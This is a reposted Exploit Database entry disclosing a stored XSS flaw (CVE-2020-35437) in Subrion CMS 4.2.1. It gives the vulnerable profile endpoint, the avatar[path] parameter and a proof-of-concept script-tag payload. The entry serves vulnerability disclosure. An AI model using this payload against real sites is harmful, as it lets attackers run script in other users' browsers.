Subrion CMS 4.2.1 – ‘avatar[path]’ XSS

• Exploit Database
• 15 阅读

• 作者： icekam
  日期： 2021-01-04
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/49346/

• # Exploit Title: Subrion CMS 4.2.1 - 'avatar[path]' XSS
  # Date: 2020-12-15
  # Exploit Author: icekam
  # Vendor Homepage: https://subrion.org/ <https://www.icekam.com/>
  # Software Link: https://github.com/intelliants/subrion
  # Version: Subrion CMS 4.2.1
  # CVE : CVE-2020-35437
  
  stored xss vulnerability in /_core/profile/.
   Reproduce through the avatar[path] parameter in post /_core/profile/ url.
   payload:"><sCrIpT>alert(1)</sCrIpT>
  
  https://github.com/intelliants/subrion/issues/880